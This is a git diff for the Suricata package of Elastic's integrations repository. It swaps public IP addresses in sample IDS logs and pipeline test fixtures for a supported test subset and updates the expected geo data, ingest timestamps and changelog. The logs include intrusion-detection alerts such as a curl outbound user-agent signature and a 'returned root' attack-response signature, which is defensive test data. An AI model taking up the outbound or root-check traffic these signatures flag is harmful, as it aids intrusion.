-{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0010"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0003"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0011"}} -{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0004"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} +{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}} {"timestamp":"2019-08-23T02:03:36.578089+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":48288,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9104,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-23T02:03:36.578262+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":59203,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12859,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"}]}} -{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"}]}} +{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}]}} +{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}]}} diff --git a/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson b/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson index 45163a617e9..bba9cb3c87f 100644 --- a/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson +++ b/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson @@ -2,7 +2,7 @@ {"timestamp":"2018-07-05T15:07:20.910626-0400","flow_id":904992230150281,"in_iface":"en0","event_type":"alert","src_ip":"192.168.86.85","src_port":55641,"dest_ip":"192.168.156.70","dest_port":443,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2024833,"rev":3,"signature":"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)","category":"Potential Corporate Privacy Violation","severity":1},"tls":{"session_resumed":true,"sni":"l2.io","version":"TLS 1.2"},"app_proto":"tls","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":793,"bytes_toclient":343,"start":"2018-07-05T15:07:19.659593-0400"}} {"timestamp":"2018-07-05T15:43:47.690014-0400","flow_id":2115002772430095,"in_iface":"en0","event_type":"http","src_ip":"192.168.86.85","src_port":56119,"dest_ip":"192.168.86.28","dest_port":63963,"proto":"TCP","tx_id":0,"http":{"hostname":"192.168.86.28","url":"\/dd.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 Safari\/537.36","http_content_type":"text\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1155}} {"timestamp":"2018-07-05T15:44:33.222441-0400","flow_id":2211411903323127,"in_iface":"en0","event_type":"fileinfo","src_ip":"192.168.86.28","src_port":8008,"dest_ip":"192.168.86.85","dest_port":56118,"proto":"TCP","http":{"hostname":"192.168.86.28","url":"\/ssdp\/device-desc.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 Safari\/537.36","http_content_type":"application\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1071},"app_proto":"http","fileinfo":{"filename":"\/ssdp\/device-desc.xml","gaps":false,"state":"CLOSED","md5":"427b7337ff37eeb24d74f47d8e04cf21","sha1":"313573490192c685e9e53abef25453ed0d5e2aee","sha256":"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b","stored":false,"size":1071,"tx_id":0}} -{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"172.217.13.110"}} +{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}} {"timestamp":"2018-07-05T15:51:23.009510-0400","event_type":"stats","stats":{"uptime":5400,"capture":{"kernel_packets":430313,"kernel_drops":0,"kernel_ifdrops":0},"decoder":{"pkts":430313,"bytes":335138381,"invalid":2,"ipv4":425873,"ipv6":3785,"ethernet":430313,"raw":0,"null":0,"sll":0,"tcp":370093,"udp":58337,"sctp":0,"icmpv4":186,"icmpv6":1019,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"ieee8021ah":0,"teredo":1,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":778,"max_pkt_size":1514,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"tcp":1113,"udp":1881,"icmpv4":0,"icmpv6":677,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":11537312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":842,"ssn_memcap_drop":0,"pseudo":0,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":1138,"synack":656,"rst":1165,"segment_memcap_drop":0,"stream_depth_reached":63,"reassembly_gap":0,"overlap":5979,"overlap_diff_data":0,"insert_data_normal_fail":0,"insert_data_overlap_fail":0,"insert_list_fail":0,"memuse":4587520,"reassembly_memuse":768000},"detect":{"alert":2},"app_layer":{"flow":{"http":22,"ftp":0,"smtp":0,"tls":560,"ssh":4,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":2,"dcerpc_udp":0,"dns_udp":762,"failed_udp":1119},"tx":{"http":25,"ftp":0,"smtp":0,"tls":0,"ssh":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"dcerpc_udp":0,"dns_udp":762}},"flow_mgr":{"closed_pruned":729,"new_pruned":1879,"est_pruned":975,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":8,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":2},"file_store":{"open_files":0},"dns":{"memuse":7749,"memcap_state":0,"memcap_global":0},"http":{"memuse":17861,"memcap":0}}} {"timestamp":"2018-07-05T15:51:50.666597-0400","flow_id":89751777876473,"in_iface":"en0","event_type":"tls","src_ip":"192.168.86.85","src_port":56187,"dest_ip":"17.142.164.13","dest_port":443,"proto":"TCP","tls":{"subject":"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US","issuerdn":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","serial":"5C:9C:E1:09:78:87:F8:07","fingerprint":"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47","sni":"p33-btmmdns.icloud.com.","version":"TLS 1.2","notbefore":"2017-02-27T17:54:31","notafter":"2019-03-29T17:54:31"}} {"timestamp":"2018-07-05T15:51:54.001329-0400","flow_id":1828507008887644,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fada:0cff:fedc:87f1","src_port":546,"dest_ip":"ff02:0000:0000:0000:0000:0000:0001:0002","dest_port":547,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":110,"bytes_toclient":0,"start":"2018-07-05T15:51:23.453468-0400","end":"2018-07-05T15:51:23.453468-0400","age":0,"state":"new","reason":"timeout","alerted":false}} diff --git a/packages/suricata/changelog.yml b/packages/suricata/changelog.yml index 681df454545..98f101aab26 100644 --- a/packages/suricata/changelog.yml +++ b/packages/suricata/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log index 15d880f0630..3e1f35cb9e5 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log @@ -1 +1 @@ -{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} +{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"175.16.199.1","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json index 739a7835709..f4d460235d9 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json @@ -16,21 +16,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "52.222.141.99", + "address": "175.16.199.1", "port": 80, "bytes": 496, - "ip": "52.222.141.99", + "ip": "175.16.199.1", "mac": "00:03:2d:3f:e5:63", "packets": 6 }, @@ -58,7 +63,7 @@ "testmynids.org" ], "ip": [ - "52.222.141.99" + "175.16.199.1" ] }, "http": { @@ -96,8 +101,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.050858Z", - "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", + "ingested": "2021-12-09T13:45:19.608432300Z", + "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", "start": "2021-01-22T22:28:38.673Z", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json index 70e0c3183f3..cfc6a2e50d1 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json @@ -80,7 +80,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312580300Z", + "ingested": "2021-12-09T13:45:19.996624600Z", "original": "{\"timestamp\":\"2018-10-03T14:42:44.836744+0000\",\"flow_id\":2191386088856669,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32858,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T14:42:44.613469+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -182,7 +182,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312602700Z", + "ingested": "2021-12-09T13:45:19.996633900Z", "original": "{\"timestamp\":\"2018-10-03T16:16:26.711841+0000\",\"flow_id\":678269478904081,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32864,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:16:26.467217+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -284,7 +284,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312609300Z", + "ingested": "2021-12-09T13:45:19.996640100Z", "original": "{\"timestamp\":\"2018-10-03T16:44:50.813100+0000\",\"flow_id\":1170030461115650,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32870,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:44:50.580866+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -386,7 +386,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312614800Z", + "ingested": "2021-12-09T13:45:19.996646Z", "original": "{\"timestamp\":\"2018-10-03T16:45:09.267308+0000\",\"flow_id\":49628113637132,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32872,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:09.036620+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -488,7 +488,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312619700Z", + "ingested": "2021-12-09T13:45:19.996652100Z", "original": "{\"timestamp\":\"2018-10-03T16:45:34.481113+0000\",\"flow_id\":116307482565223,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32876,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:34.252519+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -590,7 +590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312624500Z", + "ingested": "2021-12-09T13:45:19.996658Z", "original": "{\"timestamp\":\"2018-10-03T17:02:38.900976+0000\",\"flow_id\":1205867738178946,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32892,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T17:02:38.599426+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -691,7 +691,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312642100Z", + "ingested": "2021-12-09T13:45:19.996663900Z", "original": 